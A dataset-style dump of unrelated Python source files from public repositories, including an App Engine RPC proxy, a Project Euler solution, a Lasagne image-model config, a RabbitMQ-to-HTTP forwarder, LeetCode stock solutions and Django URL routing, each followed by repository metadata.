      apiproxy_errors.Error or a subclass.
    """
    stub = self.GetStub(service)
    assert stub, 'No api proxy found for service "%s"' % service
    if hasattr(stub, 'CreateRPC'):
      # RPC-capable stub: drive the call through the RPC machinery so the
      # hooks receive the rpc object as well.
      rpc = stub.CreateRPC()
      self.__precall_hooks.Call(service, call, request, response, rpc)
      rpc.MakeCall(service, call, request, response)
      rpc.Wait()
      rpc.CheckSuccess()
      self.__postcall_hooks.Call(service, call, request, response, rpc)
    else:
      self.__precall_hooks.Call(service, call, request, response)
      stub.MakeSyncCall(service, call, request, response)
      self.__postcall_hooks.Call(service, call, request, response)
class UserRPC(object):
  """Wrapper class for asynchronous RPC.

  Simplest low-level usage pattern:

    rpc = UserRPC('service', [deadline], [callback])
    rpc.make_call('method', request, response)
    .
    .
    .
    rpc.wait()
    rpc.check_success()

  However, a service module normally provides a wrapper so that the
  typical usage pattern becomes more like this:

    from google.appengine.api import service
    rpc = service.create_rpc([deadline], [callback])
    service.make_method_call(rpc, [service-specific-args])
    .
    .
    .
    rpc.wait()
    result = rpc.get_result()

  The service.make_method_call() function sets a service- and method-
  specific hook function that is called by rpc.get_result() with the
  rpc object as its first argument, and service-specific value as its
  second argument.  The hook function should call rpc.check_success()
  and then extract the user-level result from the rpc.result
  protobuffer.  Additional arguments may be passed from
  make_method_call() to the get_result hook via the second argument.
  """

  # Class-level defaults; make_call() and check_success() overwrite these
  # with instance attributes, so unset state reads fall back to these.
  __method = None
  __get_result_hook = None
  __user_data = None
  __postcall_hooks_called = False

  def __init__(self, service, deadline=None, callback=None):
    """Constructor.

    Args:
      service: The service name.
      deadline: Optional deadline.  Default depends on the implementation.
      callback: Optional argument-less callback function.
    """
    self.__service = service
    # The underlying implementation RPC; all state queries delegate to it.
    self.__rpc = CreateRPC(service)
    self.__rpc.deadline = deadline
    self.__rpc.callback = callback

  @property
  def service(self):
    """Return the service name."""
    return self.__service

  @property
  def method(self):
    """Return the method name."""
    return self.__method

  @property
  def deadline(self):
    """Return the deadline, if set explicitly (otherwise None)."""
    return self.__rpc.deadline

  def __get_callback(self):
    """Return the callback attribute, a function without arguments.

    This attribute can also be assigned to.  For example, the
    following code calls some_other_function(rpc) when the RPC is
    complete:

      rpc = service.create_rpc()
      rpc.callback = lambda: some_other_function(rpc)
      service.make_method_call(rpc)
      rpc.wait()
    """
    return self.__rpc.callback

  def __set_callback(self, callback):
    """Set the callback function."""
    self.__rpc.callback = callback

  # Read/write property built from the two private accessors above.
  callback = property(__get_callback, __set_callback)

  @property
  def request(self):
    """Return the request protocol buffer object."""
    return self.__rpc.request

  @property
  def response(self):
    """Return the response protocol buffer object."""
    return self.__rpc.response

  @property
  def state(self):
    """Return the RPC state.

    Possible values are attributes of apiproxy_rpc.RPC: IDLE, RUNNING,
    FINISHING.
    """
    return self.__rpc.state

  @property
  def get_result_hook(self):
    """Return the get-result hook function."""
    return self.__get_result_hook

  @property
  def user_data(self):
    """Return the user data for the hook function."""
    return self.__user_data

  def make_call(self, method, request, response,
                get_result_hook=None, user_data=None):
    """Initiate a call.

    Args:
      method: The method name.
      request: The request protocol buffer.
      response: The response protocol buffer.
      get_result_hook: Optional get-result hook function.  If not None,
        this must be a function with exactly one argument, the RPC
        object (self).  Its return value is returned from get_result().
      user_data: Optional additional arbitrary data for the get-result
        hook function.  This can be accessed as rpc.user_data.  The
        type of this value is up to the service module.

    This function may only be called once per RPC object.  It sends
    the request to the remote server, but does not wait for a
    response.  This allows concurrent execution of the remote call and
    further local processing (e.g., making additional remote calls).

    Before the call is initiated, the precall hooks are called.
    """
    # Single-use guard: the underlying RPC must still be idle.
    assert self.__rpc.state == apiproxy_rpc.RPC.IDLE, repr(self.state)
    self.__method = method
    self.__get_result_hook = get_result_hook
    self.__user_data = user_data
    apiproxy.GetPreCallHooks().Call(
        self.__service, method, request, response, self.__rpc)
    self.__rpc.MakeCall(self.__service, method, request, response)

  def wait(self):
    """Wait for the call to complete, and call callbacks.

    This is the only time callback functions may be called.  (However,
    note that check_success() and get_result() call wait().)  Waiting
    for one RPC may cause callbacks for other RPCs to be called.

    Callback functions may call check_success() and get_result().

    Callbacks are called without arguments; if a callback needs access
    to the RPC object a Python nested function (a.k.a. closure) or a
    bound may be used.  To facilitate this, the callback may be
    assigned after the RPC object is created (but before make_call()
    is called).

    Note: don't confuse callbacks with get-result hooks or precall
    and postcall hooks.
    """
    assert self.__rpc.state != apiproxy_rpc.RPC.IDLE, repr(self.state)
    if self.__rpc.state == apiproxy_rpc.RPC.RUNNING:
      self.__rpc.Wait()
    assert self.__rpc.state == apiproxy_rpc.RPC.FINISHING, repr(self.state)

  def check_success(self):
    """Check for success of the RPC, possibly raising an exception.

    This function should be called at least once per RPC.  If wait()
    hasn't been called yet, it is called first.  If the RPC caused
    an exceptional condition, an exception will be raised here.
    The first time check_success() is called, the postcall hooks
    are called.
    """
    self.wait()
    self.__rpc.CheckSuccess()
    # Postcall hooks fire exactly once per RPC, on the first successful
    # check; the flag becomes an instance attribute here.
    if not self.__postcall_hooks_called:
      self.__postcall_hooks_called = True
      apiproxy.GetPostCallHooks().Call(self.__service, self.__method,
                                       self.request, self.response, self.__rpc)

  def get_result(self):
    """Get the result of the RPC, or possibly raise an exception.

    This implies a call to check_success().  If a get-result hook was
    passed to make_call(), that hook is responsible for calling
    check_success(), and the return value of the hook is returned.
    Otherwise, check_success() is called directly and None is
    returned.
    """
    if self.__get_result_hook is None:
      self.check_success()
      return None
    else:
      return self.__get_result_hook(self)
def GetDefaultAPIProxy():
  """Build the module-level stub map, bound to the runtime's apiproxy if one exists."""
  try:
    runtime = __import__('google.appengine.runtime', globals(), locals(),
                         ['apiproxy'])
  except ImportError:
    # Not running inside the App Engine runtime.
    return APIProxyStubMap()
  try:
    return APIProxyStubMap(runtime.apiproxy)
  except AttributeError:
    # Runtime module present but without an apiproxy attribute.
    return APIProxyStubMap()


apiproxy = GetDefaultAPIProxy()
| [
"hylom@silver.local"
] | hylom@silver.local |
def repFraction(d):
    """Return (digitList, remainderList) describing the decimal expansion of 1/d.

    digitList holds the decimal digits of 1/d in order.  If the expansion
    terminates it is just the digits; if it repeats, the digit at which a
    remainder first recurs is followed by the sentinel 'r'.

    remainderList records the remainder that produced each digit, starting
    with the initial 1, with the placeholder 's' for each leading-zero digit
    emitted while the scaled remainder is still smaller than d.  lenRepeat()
    consumes this list to measure the cycle length (the 's' entries count as
    zero digits inside the cycle).

    Args:
      d: positive integer denominator (d >= 2).
    """
    r_0 = 1  # current remainder carried into the next digit
    k = 1    # power of ten needed to make r_0 * 10**k >= d
    digitList = []
    remainderList = [1]
    while True:
        # Emit zero digits while 10**k * r_0 is still smaller than d.
        while d > r_0 * 10 ** k:
            k = k + 1
            digitList.append(0)
            remainderList.append('s')
        # Now d <= r_0 * 10**k: emit the next nonzero digit.
        # '//' (floor division) keeps this correct on both Python 2 and 3;
        # the original '/' produced floats under Python 3.
        x = r_0 * 10 ** k // d
        rem = r_0 * 10 ** k - x * d
        if rem == 0:
            # Expansion terminates.
            digitList.append(x)
            remainderList.append(rem)
            return digitList, remainderList
        elif rem in remainderList:
            # Remainder recurs: expansion repeats from here; mark with 'r'.
            digitList.append(x)
            digitList.append('r')
            remainderList.append(rem)
            return digitList, remainderList
        else:
            digitList.append(x)
            remainderList.append(rem)
            r_0 = rem
            k = 1
def lenRepeat(z):
    """Return the length of the repeating decimal cycle encoded by repFraction().

    z is the (digitList, remainderList) pair produced by repFraction(d).
    Returns 0 for a terminating expansion.  NOTE: mutates the lists in z.
    """
    digits, remainders = z
    if digits.pop() != 'r':
        # No repeat marker: the expansion terminates.
        return 0
    # The cycle runs from the first occurrence of the final remainder to its
    # recurrence; count the entries in between (including the 's'
    # placeholders, which stand for zero digits inside the cycle).
    lastRem = remainders.pop()
    count = 1
    while remainders.pop() != lastRem:
        count = count + 1
    return count
# Project Euler 26: find the d < 1000 for which 1/d has the longest
# recurring decimal cycle.  The original hard-coded the known cycle length
# (982) and printed every matching d; computing the argmax directly prints
# the same answer (983) without the magic number, and print() keeps the
# script runnable on both Python 2 and Python 3.
best_d = 0
best_cycle = 0
for i in range(2, 1000):
    cycle = lenRepeat(repFraction(i))
    if cycle > best_cycle:
        best_cycle = cycle
        best_d = i
print(best_d)
"amomin@evermight.com"
] | amomin@evermight.com |
2d283c29a7787686b4bcf6f95235d830ff3d30c7 | 2359121ebcebba9db2cee20b4e8f8261c5b5116b | /configs/d4_16.py | 9cb1b39825a598c084e3817351bc0cf9c8b9f6e7 | [] | no_license | EliasVansteenkiste/plnt | 79840bbc9f1518c6831705d5a363dcb3e2d2e5c2 | e15ea384fd0f798aabef04d036103fe7af3654e0 | refs/heads/master | 2021-01-20T00:34:37.275041 | 2017-07-20T18:03:08 | 2017-07-20T18:03:08 | 89,153,531 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,394 | py |
#config a6 is equivalent to a5, except the normalization
import numpy as np
import lasagne as nn
from collections import namedtuple
from functools import partial
import lasagne.layers.dnn as dnn
import lasagne
import theano.tensor as T
import data_transforms
import data_iterators
import pathfinder
import utils
import app
import nn_planet
restart_from_save = None
rng = np.random.RandomState(42)
# transformations
p_transform = {'patch_size': (256, 256),
'channels': 4,
'n_labels': 1,
'n_feat': 64,
'label_id': 16}
#only lossless augmentations
p_augmentation = {
'rot90_values': [0,1,2,3],
'flip': [0, 1]
}
# data preparation function
def data_prep_function_train(x, p_transform=p_transform, p_augmentation=p_augmentation, **kwargs):
    """Prepare one training patch: HxWxC -> CxHxW float32 in [0, 1],
    then apply the lossless (rot90 / flip) augmentations."""
    patch = np.array(x)
    patch = np.swapaxes(patch, 0, 2)
    patch = (patch / 255.).astype(np.float32)
    return data_transforms.lossless(patch, p_augmentation, rng)
def data_prep_function_valid(x, p_transform=p_transform, **kwargs):
    """Prepare one validation/test patch: HxWxC -> CxHxW float32 scaled
    to [0, 1]; no augmentation is applied."""
    patch = np.swapaxes(np.array(x), 0, 2)
    return (patch / 255.).astype(np.float32)
def label_prep_function(label):
    """Select the single target label this config trains on."""
    label_index = p_transform['label_id']
    return label[label_index]
# data iterators
# 0.18308259
batch_size = 3
pos_batch_size = 2
neg_batch_size = 1
assert batch_size == (pos_batch_size+neg_batch_size)
nbatches_chunk = 1
chunk_size = batch_size * nbatches_chunk
folds = app.make_stratified_split(no_folds=5)
print len(folds)
train_ids = folds[0] + folds[1] + folds[2] + folds[3]
valid_ids = folds[4]
all_ids = folds[0] + folds[1] + folds[2] + folds[3] + folds[4]
bad_ids = []
train_ids = [x for x in train_ids if x not in bad_ids]
valid_ids = [x for x in valid_ids if x not in bad_ids]
test_ids = np.arange(40669)
test2_ids = np.arange(20522)
train_data_iterator = data_iterators.DiscriminatorDataGenerator(dataset='train-jpg',
batch_size=batch_size,
pos_batch_size=pos_batch_size,
label_id = p_transform['label_id'],
img_ids = train_ids,
p_transform=p_transform,
data_prep_fun = data_prep_function_train,
label_prep_fun = label_prep_function,
rng=rng,
full_batch=True, random=True, infinite=True)
feat_data_iterator = data_iterators.DataGenerator(dataset='train-jpg',
batch_size=batch_size,
pos_batch_size=pos_batch_size,
img_ids = train_ids,
p_transform=p_transform,
data_prep_fun = data_prep_function_train,
label_prep_fun = label_prep_function,
rng=rng,
full_batch=False, random=False, infinite=False)
valid_data_iterator = data_iterators.DiscriminatorDataGenerator(dataset='train-jpg',
batch_size=batch_size,
pos_batch_size=pos_batch_size,
label_id = p_transform['label_id'],
img_ids = valid_ids,
p_transform=p_transform,
data_prep_fun = data_prep_function_train,
label_prep_fun = label_prep_function,
rng=rng,
full_batch=True, random=False, infinite=False)
test_data_iterator = data_iterators.DataGenerator(dataset='test-jpg',
batch_size=batch_size,
pos_batch_size=pos_batch_size,
img_ids = test_ids,
p_transform=p_transform,
data_prep_fun = data_prep_function_valid,
label_prep_fun = label_prep_function,
rng=rng,
full_batch=False, random=False, infinite=False)
test2_data_iterator = data_iterators.DataGenerator(dataset='test2-jpg',
batch_size=batch_size,
pos_batch_size=pos_batch_size,
img_ids = test2_ids,
p_transform=p_transform,
data_prep_fun = data_prep_function_valid,
label_prep_fun = label_prep_function,
rng=rng,
full_batch=False, random=False, infinite=False)
nchunks_per_epoch = train_data_iterator.nsamples / chunk_size
max_nchunks = nchunks_per_epoch * 40
validate_every = int(0.1 * nchunks_per_epoch)
save_every = int(1. * nchunks_per_epoch)
learning_rate_schedule = {
0: 5e-4,
int(max_nchunks * 0.4): 2e-4,
int(max_nchunks * 0.6): 1e-4,
int(max_nchunks * 0.7): 5e-5,
int(max_nchunks * 0.8): 2e-5,
int(max_nchunks * 0.9): 1e-5
}
# model
conv = partial(dnn.Conv2DDNNLayer,
filter_size=3,
pad='same',
W=nn.init.Orthogonal(),
nonlinearity=nn.nonlinearities.very_leaky_rectify)
max_pool = partial(dnn.MaxPool2DDNNLayer,
pool_size=2)
drop = lasagne.layers.DropoutLayer
dense = partial(lasagne.layers.DenseLayer,
W=lasagne.init.Orthogonal(),
nonlinearity=lasagne.nonlinearities.very_leaky_rectify)
def inrn_v2(lin, last_layer_nonlin=lasagne.nonlinearities.rectify):
    """Inception-ResNet style block: three parallel conv towers whose
    concatenation is projected back to the input channel count and summed
    with the input (residual connection)."""
    filters = 32

    # Tower 1: a single 1x1 conv.
    tower_1 = conv(lin, filters, filter_size=1)

    # Tower 2: 1x1 followed by 3x3.
    tower_2 = conv(conv(lin, filters, filter_size=1), filters, filter_size=3)

    # Tower 3: 1x1 followed by two 3x3 convs.
    tower_3 = conv(lin, filters, filter_size=1)
    tower_3 = conv(tower_3, filters, filter_size=3)
    tower_3 = conv(tower_3, filters, filter_size=3)

    merged = lasagne.layers.ConcatLayer([tower_1, tower_2, tower_3])
    # Project back to the input's channel count so the residual sum is valid.
    projected = conv(merged, lin.output_shape[1], filter_size=1)
    residual = lasagne.layers.ElemwiseSumLayer([projected, lin])
    return lasagne.layers.NonlinearityLayer(residual, nonlinearity=last_layer_nonlin)
def inrn_v2_red(lin):
    """Reduction block: halve the spatial resolution via four parallel
    paths (max-pool plus three strided conv towers) and concatenate them,
    reducing the total activation volume by roughly a factor of 4."""
    in_channels = lin.output_shape[1]
    # Path channel counts are expressed in sixteenths of the input width.
    unit = in_channels // 16

    path_1 = max_pool(lin)

    path_2 = conv(lin, unit * 4, filter_size=3, stride=2)

    path_3 = conv(lin, unit * 4, filter_size=1)
    path_3 = conv(path_3, unit * 5, filter_size=3, stride=2)

    path_4 = conv(lin, unit * 4, filter_size=1)
    path_4 = conv(path_4, unit * 5, filter_size=3)
    path_4 = conv(path_4, unit * 7, filter_size=3, stride=2)

    return lasagne.layers.ConcatLayer([path_1, path_2, path_3, path_4])
def feat_red(lin):
    """Halve the number of feature maps with a 1x1 convolution."""
    return conv(lin, lin.output_shape[1] // 2, filter_size=1)
def build_model():
    """Assemble the embedding network: a conv stem, three
    (reduction -> inception-resnet) stages, dropout, global pooling, and a
    linear head producing an `n_feat`-dimensional embedding."""
    l_in = nn.layers.InputLayer((None, p_transform['channels'],) + p_transform['patch_size'])
    l_target = nn.layers.InputLayer((None,))

    net = conv(l_in, 64)
    for _ in range(3):
        net = inrn_v2_red(net)
        net = inrn_v2(net)

    net = drop(net)
    l_neck = nn.layers.GlobalPoolLayer(net)
    # Identity nonlinearity: the output is a raw embedding, not class scores.
    l_out = nn.layers.DenseLayer(l_neck, num_units=p_transform['n_feat'],
                                 W=nn.init.Orthogonal(),
                                 nonlinearity=nn.nonlinearities.identity)

    return namedtuple('Model', ['l_in', 'l_out', 'l_neck', 'l_target'])(l_in, l_out, l_neck, l_target)
def build_objective(model, deterministic=False, epsilon=1.e-7):
    """Triplet hinge loss for a batch of three embeddings laid out as
    (positive, positive, negative): pull the positive pair together and
    push the closest positive-negative pair at least `margin` apart."""
    feat = nn.layers.get_output(model.l_out, deterministic=deterministic)
    # Kept for parity with the original graph; not used by the loss below.
    targets = T.cast(T.flatten(nn.layers.get_output(model.l_target)), 'int32')
    # Pairwise L1 distances between all embeddings in the batch.
    dist = T.sum(abs(feat.dimshuffle(['x', 0, 1]) - feat.dimshuffle([0, 'x', 1])), axis=2)
    pos_dist = dist[0, 1]
    neg_dist = T.min(T.stack([dist[0, 2], dist[1, 2]]))
    margin = np.float32(1.)
    zero = np.float32(0.)
    return T.max(T.stack([margin + pos_dist - neg_dist, zero]))
def build_objective2(model, deterministic=False, epsilon=1.e-7):
    """Validation objective.

    This was a byte-for-byte duplicate of build_objective (the same triplet
    hinge loss), so it now delegates instead of duplicating the code; the
    dead commented-out variant that returned d_n has been removed.
    """
    return build_objective(model, deterministic=deterministic, epsilon=epsilon)
def sigmoid(x):
    """Elementwise logistic function 1 / (1 + e^-x)."""
    return 1. / (1. + np.exp(-x))
def score(gts, feats):
    """Compute (tp, fp, fn) counts for the embedding-distance classifier.

    Embeddings are squashed through a sigmoid, all pairwise mean-absolute
    distances are formed, and each sample's "positive score" is one minus
    its mean distance to the positive set; scores above 0.5 count as
    positive predictions.
    """
    feats = np.vstack(feats)
    labels = np.int32(np.vstack(gts))

    probs = sigmoid(feats)
    # Pairwise mean absolute distance between all embeddings.
    dist = np.mean(np.abs(probs[None, :, :] - probs[:, None, :]), axis=2)

    pos_mask = (labels > 0.5).flatten()
    neg_mask = (labels < 0.5).flatten()

    # Similarity of each sample to the positive cluster (1 - mean distance).
    preds_p = 1 - np.mean(dist[pos_mask][:, pos_mask], axis=1)
    preds_n = 1 - np.mean(dist[neg_mask][:, pos_mask], axis=1)

    threshold = 0.5
    tp = np.sum(preds_p > threshold)
    fp = np.sum(preds_n > threshold)
    fn = np.sum(preds_p < threshold)
    return np.array([tp, fp, fn])
test_score = score
def build_updates(train_loss, model, learning_rate):
    """Adam updates for every trainable parameter reachable from l_out."""
    params = nn.layers.get_all_params(model.l_out, trainable=True)
    return nn.updates.adam(train_loss, params, learning_rate)
| [
"Elias.Vansteenkiste@gmail.com"
] | Elias.Vansteenkiste@gmail.com |
192d6fe790c62907ebf8671fffb1cdeac974733b | 12508b7481a5910e7f5568c99afa3f1e1d487066 | /catkin_ws/build/darknet_ros_msgs/catkin_generated/generate_cached_setup.py | 7134d326bd259fe991c20c3ee337778e524273c8 | [] | no_license | lkj10/ros_study | 1aabc439b5d17d19ce623a8bce6d5d9645d3f238 | a2ada1854fff366338b5906709b7efb098332212 | refs/heads/master | 2023-06-05T15:01:43.511785 | 2021-06-18T08:06:51 | 2021-06-18T08:06:51 | 373,006,597 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,326 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in '/home/user/catkin_ws/devel;/opt/ros/melodic'.split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/user/catkin_ws/devel/.private/darknet_ros_msgs/env.sh')
output_filename = '/home/user/catkin_ws/build/darknet_ros_msgs/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
# print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| [
"lee_10_@naver.com"
] | lee_10_@naver.com |
a428a98e63d7caddab5315749f13cd186356343f | e054c2961fadf721fda9f48946862b7a0eb68448 | /rabbitmq_to_http_proxy.py | 288337a81ac08c08b19cfc82f4e86ae17b3fc650 | [
"MIT"
] | permissive | tomasrasymas/rabbitmq-http-proxy | 96587ee12bd01b7d1fa247f046683f37581ef4e6 | d475716e59f4dccf24d67e96adb5ec245f74c728 | refs/heads/master | 2022-12-17T21:53:28.877333 | 2018-02-19T15:58:11 | 2018-02-19T15:58:11 | 122,070,949 | 2 | 0 | MIT | 2022-12-08T00:52:27 | 2018-02-19T14:05:15 | Python | UTF-8 | Python | false | false | 2,992 | py | import json
import requests
from argparse import ArgumentParser
from rmq_consumer import RmqConsumer
def str_to_dict(string):
    """Parse a JSON document, returning None when parsing fails.

    The original used a bare ``except``, which also swallowed
    KeyboardInterrupt/SystemExit; the catch is narrowed to the exceptions
    json.loads actually raises (json.JSONDecodeError is a ValueError
    subclass, TypeError covers non-string input such as None).
    """
    try:
        return json.loads(string)
    except (ValueError, TypeError):
        return None
class RabbitMqToHttpProxy(RmqConsumer):
    """Consume JSON messages from RabbitMQ and forward each one to an HTTP
    endpoint via POST, ack'ing on success and nack'ing on failure."""

    def __init__(self, url, exchange, queue, routing_key='#', queue_type='topic', durable=True, endpoint=None,
                 verbose=False, prefetch_count=1000):
        RmqConsumer.__init__(self, url=url, exchange=exchange, queue=queue,
                             routing_key=routing_key, queue_type=queue_type, durable=durable,
                             prefetch_count=prefetch_count)
        self.endpoint = endpoint
        self.verbose = verbose
        self.headers = {'content-type': 'application/json'}

    def on_message(self, channel, method, properties, body):
        payload = str_to_dict(body)
        if not payload:
            # Unparseable (or falsy) message: leave it unacknowledged, as before.
            return

        if self.verbose:
            print(payload, end='\t' if self.endpoint else '\n')

        if self.endpoint:
            response = requests.post(self.endpoint, data=json.dumps(payload), headers=self.headers)
            if self.verbose:
                print(response.status_code, response.reason)
            if response.status_code not in (200, 201):
                # Endpoint rejected the message: requeue it via nack.
                self.nacknowledge_message(method.delivery_tag)
                return

        self.acknowledge_message(method.delivery_tag)
if __name__ == '__main__':
    parser = ArgumentParser()
    parser.add_argument('-a', '--endpoint', dest='endpoint', type=str, required=False, help='Endpoint url to post')
    parser.add_argument('-u', '--url', dest='url', type=str, required=True, help='Url of RabbitMQ server')
    parser.add_argument('-e', '--exchange', dest='exchange', type=str, required=True, help='Exchange to bind')
    parser.add_argument('-q', '--queue', dest='queue', type=str, required=True, help='Name of queue to consume')
    parser.add_argument('-p', '--prefetch_count', dest='prefetch_count', type=int, required=False, default=1000, help='Number of prefetch count')
    parser.add_argument('-r', '--routing_key', dest='routing_key', type=str, required=True, help='Routing key')
    parser.add_argument('-t', '--queue_type', dest='queue_type', type=str, required=False, help='Queue type', default='topic')
    parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', required=False, default=False, help='Verbose')
    args = parser.parse_args()

    # Echo the parsed configuration when running verbosely.
    if args.verbose:
        banner = '*' * 50
        print(banner)
        for name in vars(args):
            print(str(name) + ' - ' + str(getattr(args, name)))
        print(banner)

    proxy = RabbitMqToHttpProxy(url=args.url, exchange=args.exchange, queue=args.queue,
                                routing_key=args.routing_key, queue_type=args.queue_type,
                                endpoint=args.endpoint, verbose=args.verbose, prefetch_count=args.prefetch_count)
    proxy.run()
"tomas@dutrys.com"
] | tomas@dutrys.com |
0d36f928a95de75fd5dda09a45c0dd309b68f161 | 4504b178f456cd81283d0ebd25e5740a3a7062e5 | /correos y usuarios/NodoCabecera.py | 51262c9cbca9cd78e6a396ce318167cda01d0d4d | [] | no_license | spartan0614/Users | 22e398b539ee71f858264d4c637a11a89fa5732c | 0bbb7fc305036a0cc13be24b0e74050116f7b0f3 | refs/heads/master | 2021-01-21T10:52:44.778104 | 2017-03-05T22:28:55 | 2017-03-05T22:28:55 | 83,497,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | class NodoCabecera(object):
def __init__(self, x):
self.x = x
columna = ListaVertical()
self.siguiente = None
self.anterior = None | [
"62442joss@gmail.com"
] | 62442joss@gmail.com |
ca0f4f3aaa6d703204567dde081e416ee6d3b5b8 | 785ff68f2557422a3ad4bee9e8a9459ffe1a9128 | /src/dj_asana/apps.py | ff9026cb87bbf8e60d847d2c14990d4cdd7638a0 | [] | no_license | Saumyaoec/Todo-asana-new- | d42f7e87166ec0aff81e3f93e29dfeae6614b7cf | ee9ea8b30037ddb0d51b08a63dbca880fd824206 | refs/heads/master | 2023-08-12T00:27:48.062101 | 2021-10-05T07:47:53 | 2021-10-05T07:47:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | from django.apps import AppConfig
class DjAsanaConfig(AppConfig):
    """Django application configuration for the Asana integration app."""

    # Dotted path of the app package and its human-readable label.
    name = 'src.dj_asana'
    verbose_name = 'Asana'
| [
"adil.e.amirov@ya.ru"
] | adil.e.amirov@ya.ru |
6d08539928c9747db4f35f25def1d75569fdf93d | 94f4bb0f6e43b2eb2f1bdb284a580b76121fa9af | /309.py | c3f3545e6d6ca9a6f20a760dd5959d614480e83e | [] | no_license | huosan0123/leetcode-py | f1ec8226bae732369d4e1989b99ab0ba4b4061c4 | 22794e5e80f534c41ff81eb40072acaa1346a75c | refs/heads/master | 2021-01-25T11:48:17.365118 | 2019-09-12T15:45:34 | 2019-09-12T15:45:34 | 93,934,297 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 427 | py | class Solution(object):
def maxProfit(self, prices):
    """
    :type prices: List[int]
    :rtype: int

    Stock with cooldown, as a three-state DP: `sold` is the best cash
    after the latest sale, `holding` the best value while owning stock,
    and `prev_sold` the cash from before the previous day (enforcing the
    one-day cooldown before buying again).
    """
    prev_sold, sold, holding = 0, 0, float("-inf")
    for price in prices:
        sold, holding, prev_sold = (max(sold, holding + price),
                                    max(holding, prev_sold - price),
                                    sold)
    return sold
| [
"lc_286@126.com"
] | lc_286@126.com |
c0a323d6563dda7c8ac2b49d827352f6379ba03d | caed98915a93639e0a56b8296c16e96c7d9a15ab | /DP/stocks/Stock_II.py | 5ec46fcd78856a48fdfcf6ebdb61c059e7384e15 | [] | no_license | PiyushChandra17/365-Days-Of-LeetCode | 0647787ec7e8f1baf10b6bfc687bba06f635838c | 7e9e9d146423ca2c5b1c6a3831f21dd85fa376d5 | refs/heads/main | 2023-02-13T10:41:36.110303 | 2021-01-17T11:58:51 | 2021-01-17T11:58:51 | 319,974,573 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | class Solution:
def maxProfit(self, prices: List[int]) -> int:
    """Sum every positive day-to-day price increase (equivalent to taking
    every profitable single-day trade)."""
    profit = 0
    for today, tomorrow in zip(prices, prices[1:]):
        if tomorrow > today:
            profit += tomorrow - today
    return profit
| [
"noreply@github.com"
] | PiyushChandra17.noreply@github.com |
6d50dfec0241037b9962a1323d3b563449edf513 | fd0d0c8ecfa0da47cfcac35a6ffb4537235d3702 | /eportal/urls.py | f300d964010587be10fe559dd997868d511faae0 | [] | no_license | mohandutt134/eportal | 16b0e69a668837a854ef410e1224eaac172bccf3 | e39d004061b64bfb1016fbbb7aabc60c92b78cf3 | refs/heads/master | 2021-07-25T21:47:38.022787 | 2019-04-18T15:21:12 | 2019-04-18T15:21:12 | 254,024,373 | 0 | 0 | null | 2021-06-10T22:44:39 | 2020-04-08T08:06:52 | HTML | UTF-8 | Python | false | false | 1,789 | py | from django.contrib import admin
from django.conf.urls import *
from student import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^attendance/', include('attendance.urls')),
url(r'^quiz/', include('quiz.urls')),
url(r'^notification/', include('notification.urls')),
url(r'^accounts/', include('accounts.urls')),
url(r'^$', views.home, name='home'),
url(r'^dashboard$', views.dashboard, name='dashboard'),
url(r'^contact$', views.contactview, name='contact'),
url(r'^faculty$', views.faculties, name='faculty'),
url(r'^about$', views.about, name='about'),
url(r'^allcourses$', views.allcourses, name='allcourses'),
url(r'^courses/(?P<id>[0-9A-Za-z_\-]+)$', views.course, name='course'),
url(r'^courses$', views.courses, name='courses'),
url(r'^profile$', views.profile, name='profile'),
url(r'^profile/(?P<username>[0-9A-Za-z_\-\.]+)$', views.pprofile, name='pprofile'),
url(r'^users/(?P<username>[0-9A-Za-z_\-\.]+)/$', views.pprofile, name='pprofile'),
# # url(r'^profile_edit/$', 'profile_edit', name='profile_edit'),
# # url('^inbox/notifications/', include(notifications.urls)),
# url(r'^mail$', 'mail'),
# url(r'^change/$', 'changePassword', name='change'),
#
# url(r'^courses/(?P<id>[0-9A-Za-z_\-]+)/addmaterial$', 'add_material', name='add_material'),
# url(r'^courseinfo/(?P<id>[0-9A-Za-z_\-]+)$', 'course_info', name='course_info'),
# url(r'^courseregister/$', 'course_register', name='course_register'),
# # (r'^ckeditor/', include('ckeditor.urls')),
url(r'^addann/$', views.add_ann, name='addann'),
url(r'^addvideo/$', views.add_video, name='addvideo'),
#
# url(r'^addsyllabus/(?P<id>[0-9A-Za-z_\-]+)$$', 'add_syllabus', name='addsyllabus'),
]
| [
"vibhanshu86@gmail.com"
] | vibhanshu86@gmail.com |
d322b77825b27b31a958a4e43548fe58c0b1e526 | 9e0796e19634e191cfa08f6244305cf85454d6b0 | /core/common_data.py | fe10de394e8e2b3a532804863d26c2a04c1f9e40 | [
"BSD-2-Clause"
] | permissive | tanshinepan/interface_auto_test | 53a3094fca4f54878813cef8f4519dcf301ee2a0 | 9c2b177bd2ad60b5e1e8b1f3c7e06d6a534e9c00 | refs/heads/master | 2022-07-13T03:52:15.739207 | 2020-05-13T10:38:46 | 2020-05-13T10:38:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 581 | py | #coding=utf-8
"""
存放用户的数据
全局变量
用例集变量
用例变量
"""
#全局变量
global_vars={}
#用例集变量,每个用例集运行时会初始化
testsuite_vars={}
#用例变量,每个用例执行时会初始化
testcase_vars={}
#api template的模板集合
api_template_dic = {}
#testsuite测试用例集数据保存的集合
testsuite_dic = {}
#testsuite测试用例集数据保存的集合
testsuite_list = []
